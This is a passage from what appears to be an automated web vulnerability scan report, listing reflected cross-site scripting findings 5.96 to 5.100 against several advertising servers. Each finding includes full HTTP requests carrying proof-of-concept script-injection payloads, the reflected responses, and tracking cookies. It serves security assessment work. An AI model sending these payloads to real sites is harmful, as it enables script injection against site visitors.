.O!!!!+=!$MK!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!+=!$MK!#MTF!!!!+=!$MK!#MTH!!!!+=!$MK!#MTI!!!!+=!$MK!#MTJ!!!!+=!$MK!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!1=!$MK!#SF3!!!!1=!$MK!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!+=!$MK!#UDP!!!!1=!$MK!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%
<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!+=!$MK!#ai7!!!!+=!$MK!#ai?!!!!+=!$MK!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!+=!$MK!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!+=!$MK!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!+=!$MK!#tM)!!!!+=!$MK!#tn2!!!!+=!$MK!#uE=!!!!#<x9#K!#uJY!!!!1=!$MK!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!+=!$MK!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!.=!$MK!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!+=!$MK!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!+=!$MK!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!.=!$MK!$(S9!!!!*<yq][!$(Tb!!!!#<yQLc!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq]["; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:23:16 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0019.rm.bf1
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Wed, 11 May 2011 15:23:16 GMT
Pragma: no-cache
Content-Length: 573
Content-Type: text/html
Age: 0
Proxy-Connection: close

C1Qs4Xi5Px9F.b3Ul4Yp5Rb9V={"result":{"cpm":21525,"type":3,"ad":"http://ad.yieldmanager.com/getserved?T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEAAAIAAAAAABAAAgAEC2FsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAA
...[SNIP]...
34KQByxFp8CAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBdB4mZI4TCgJ9xOLGOqa7dL5ylQIvhcT5eLoeAAAAAA==,,http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/c4fa8<script>alert(1)</script>39e3c2a31b0&click=[CLICKURL]"}}

5.96. http://ads.adbrite.com/adserver/vdi/753292 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/753292

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ddb19<script>alert(1)</script>ee71ca49083 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/753292ddb19<script>alert(1)</script>ee71ca49083?d=AM-00000000030620452 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; fq="86xtm%2C1uo0%7Clkze39"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjFp47PDiITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIY0JnqjRMiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; 
ut="1%3AXZHJdoQgEEX%2FhbULwEZN%2F42KI4MCzk3%2FewDTiWZ76z5e1eEFFgyeL8CqfR00NeAJ9MrFbJESJk0tsjDywHgwpjSAsm2zRsF8cZA3k7DYFpHpOhl7q4AhZlHPoHclYZhMzTmqnItppFR8rI5kseaOIPLx6uHmfai4UcMrzh0ppnWwqU2K%2BFeU%2F%2BI86fbk4SmFM79u344OHn17njRui3JjjfrlEYBh8eQNoSQK5zzEAP%2FCwzWsxSDD3opmPxVhm47c184xzX0H6b%2FCk1vperDRrmDcaymtm6LpiExWJ%2BIUt%2BvKFfbvtbC5lCRpeS9hCM8hy4jXQASKXMpKd%2BFzwfv9DQ%3D%3D"; vsd=0@1@4dc982a0@pixel.33across.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Wed, 11 May 2011 15:06:56 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/753292ddb19<script>alert(1)</script>ee71ca49083

5.97. http://ads.pointroll.com/PortalServe/ [flash parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the flash request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab177'%3balert(1)//f0013846b20 was submitted in the flash parameter. This input was echoed as ab177';alert(1)//f0013846b20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1275567D53920110419140505&flash=10ab177'%3balert(1)//f0013846b20&time=3|10:0|-5&redir=http://mpc.mxptint.net/1S1SEA5BB36FS0S8FS5B5S1S12CSFAS53SB18_20CAAFAA_106E834%3f$CTURL$&pos=x&dom=http://www.medicinenet.com&r=0.7241260474547744 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=6344371306205&tile=6344371306205&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=121
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2EouvAb7yDAEECAeJozEovALEa7O!E7BCeJpJEotn9OvPEAzwCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=F0A20400-110B-CEAE-1309-A330013B0102; PRca=|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 11 May 2011 15:34:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://www.medicinenet.com/pointroll/prs.htm?pid=1275567D53920110419140505&redir=http://mpc.mxptint.net/1S1SEA5BB36FS0S8FS5B5S1S12CSFAS53SB18_20CAAFAA_106E834%3F$CTURL$&time=3|10:0|-5&flash=10ab177';alert(1)//f0013846b20&server=portalserve&bu=1917819888');

5.98. http://ads.pointroll.com/PortalServe/ [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0349'-alert(1)-'f651f34bdd0 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1275567D53920110419140505&flash=10&time=3|10:0|-5&redir=http://mpc.mxptint.net/1S1SEA5BB36FS0S8FS5B5S1S12CSFAS53SB18_20CAAFAA_106E834%3f$CTURL$b0349'-alert(1)-'f651f34bdd0&pos=x&dom=http://www.medicinenet.com&r=0.7241260474547744 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=6344371306205&tile=6344371306205&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=121
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2EouvAb7yDAEECAeJozEovALEa7O!E7BCeJpJEotn9OvPEAzwCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=F0A20400-110B-CEAE-1309-A330013B0102; PRca=|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 11 May 2011 15:34:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://www.medicinenet.com/pointroll/prs.htm?pid=1275567D53920110419140505&redir=http://mpc.mxptint.net/1S1SEA5BB36FS0S8FS5B5S1S12CSFAS53SB18_20CAAFAA_106E834%3F$CTURL$b0349'-alert(1)-'f651f34bdd0&time=3|10:0|-5&flash=10&server=portalserve&bu=1226325033');

5.99. http://ads.pointroll.com/PortalServe/ [time parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5861'%3balert(1)//763d8f4de0f was submitted in the time parameter. This input was echoed as a5861';alert(1)//763d8f4de0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1275567D53920110419140505&flash=10&time=3|10:0|-5a5861'%3balert(1)//763d8f4de0f&redir=http://mpc.mxptint.net/1S1SEA5BB36FS0S8FS5B5S1S12CSFAS53SB18_20CAAFAA_106E834%3f$CTURL$&pos=x&dom=http://www.medicinenet.com&r=0.7241260474547744 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=6344371306205&tile=6344371306205&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=121
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2EouvAb7yDAEECAeJozEovALEa7O!E7BCeJpJEotn9OvPEAzwCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=F0A20400-110B-CEAE-1309-A330013B0102; PRca=|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 11 May 2011 15:34:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://www.medicinenet.com/pointroll/prs.htm?pid=1275567D53920110419140505&redir=http://mpc.mxptint.net/1S1SEA5BB36FS0S8FS5B5S1S12CSFAS53SB18_20CAAFAA_106E834%3F$CTURL$&time=3|10:0|-5a5861';alert(1)//763d8f4de0f&flash=10&server=portalserve&bu=2223917969');

5.100. http://ads.specificmedia.com/serve/v=5 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in si